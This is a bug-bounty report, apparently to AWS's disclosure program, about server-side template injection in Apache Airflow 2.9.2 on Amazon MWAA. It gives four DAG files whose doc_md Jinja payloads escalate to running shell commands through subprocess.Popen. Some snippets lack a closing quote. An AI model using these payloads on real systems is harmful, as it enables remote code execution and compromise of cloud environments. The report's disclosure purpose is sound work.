Remote Code Execution in Amazon MWAA due to outdated Apache Airflow version
None
A
AWS VDP
Submitted None
Actions:
Reported by
ricardojoserf
Vulnerability Details
Technical details and impact analysis
**Explanation:**
I am a penetration tester working with Siemens. During a collaborative security assessment with an internal team, I discovered a Remote Code Execution (RCE) vulnerability in an Amazon Managed Workflows for Apache Airflow (MWAA) environment. I initially reported this issue to the AWS security team via [email protected], and they directed me to submit the vulnerability through this HackerOne program. I also would like to know how far it is legally correct to execute code, I understand this is Amazon's infrastructure so I just did a quick PoC to prove the affected team how important it is to solve this issue.
**Description:**
The team using Amazon MWAA is currently running Apache Airflow version 2.9.2, which is affected by CVE-██████████-39877, a Server-Side Template Injection (SSTI) vulnerability that enables Remote Code Execution (RCE).
**Recommendations:**
Given the severity of this issue, I strongly recommend that :
- Amazon discontinues offering any Airflow versions below 2.9.3 on the MWAA service.
- Disable classes which might be used to execute code remotely on the context of the MWAA environment, such as *subprocess.Popen*.
- Additionally, if any customers are still running vulnerable versions, they should be proactively notified, similar to how they receive alerts when suspicious activity is detected, such as repeated requests to /robots.txt that may indicate web scanner activity.
## Steps To Reproduce:
1. First, upload to the S3 bucket a DAG file named "test_1.py" to check the vulnerability exists. If it does, there should be a "9" when clicking "Grid" in the newly created "test_1" DAG - if not, the version might not be vulnerable:
```
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
def say_hello():
print("¡Hola, mundo desde Airflow!")
default_args = {
'owner': 'airflow',
'retries': 1,
'retry_delay': timedelta(minutes=1),
}
with DAG(
dag_id='test_1',
default_args=default_args,
description='Test Uno',
schedule_interval='@daily', # se ejecuta una vez al día
start_date=datetime(███████),
catchup=False,
tags=['ejemplo'],
doc_md="""
# Test 1
{{3*3}}
"""
) as dag:
tarea_1 = PythonOperator(
task_id='di_hola',
python_callable=say_hello,
)
```
2. Second, upload to the S3 bucket a DAG file "test_2.py" to list the available classes, with code like this:
```
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
def say_hello():
print("¡Hola, mundo desde Airflow!")
default_args = {
'owner': 'airflow',
'retries': 1,
'retry_delay': timedelta(minutes=1),
}
with DAG(
dag_id='test_2',
default_args=default_args,
description='Un DAG de ejemplo muy simple',
schedule_interval='@daily', # se ejecuta una vez al día
start_date=datetime(██████),
catchup=False,
tags=['ejemplo'],
doc_md="""
# Test 2
{{ ''.__class__.__mro__[1].__subclasses__() }}
"""
) as dag:
tarea_1 = PythonOperator(
task_id='di_hola',
python_callable=say_hello,
)
```
3. Copy the list of available classes and find the index for the *subProcess.Popen* class. A easy way to do this is is to copy all the classes until Popen class, and count the number of commas before it. In my case the index number is 309, but it will be different when you test this.
4. Once you have the correct index, check the class name is correct, you should see "Popen" if you got the correct index. Upload "test_3.py". **NOTE**: Update the correct index, it will not be 309:
```
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
def say_hello():
print("¡Hola, mundo desde Airflow!")
default_args = {
'owner': 'airflow',
'retries': 1,
'retry_delay': timedelta(minutes=1),
}
with DAG(
dag_id='test_3',
default_args=default_args,
description='Un DAG de ejemplo muy simple',
schedule_interval='@daily', # se ejecuta una vez al día
start_date=datetime(██████),
catchup=False,
tags=['ejemplo'],
doc_md="""
# Test 3
### Class Name
{{ ''.__class__.__mro__[1].__subclasses__()[309].__name__ }}
) as dag:
tarea_1 = PythonOperator(
task_id='di_hola',
python_callable=say_hello,
)
```
5. Now with the correct index, run a command on the context of the MWAA environment with "test_4.py". **NOTE**: Update the correct index, it will not be 309:
```
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
def say_hello():
print("¡Hola, mundo desde Airflow!")
default_args = {
'owner': 'airflow',
'retries': 1,
'retry_delay': timedelta(minutes=1),
}
with DAG(
dag_id='test_4',
default_args=default_args,
description='Un DAG de ejemplo muy simple',
schedule_interval='@daily', # se ejecuta una vez al día
start_date=datetime(█████),
catchup=False,
tags=['ejemplo'],
doc_md="""
# Test 4
### Commands Output
{{ ''.__class__.__mro__[1].__subclasses__()[309]('id', shell=True, stdout=-1).communicate() }}
) as dag:
tarea_1 = PythonOperator(
task_id='di_hola',
python_callable=say_hello,
)
```
## Impact
## Summary: An attacker can execute arbitrary commands remotely on the affected environment. While I limited my actions to a non-destructive proof-of-concept command, a malicious actor could leverage this vulnerability to access sensitive data, manipulate the system, or pivot to attack other resources within the same VPC. The risk includes potential full system compromise and lateral movement within the cloud infrastructure.
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Code Injection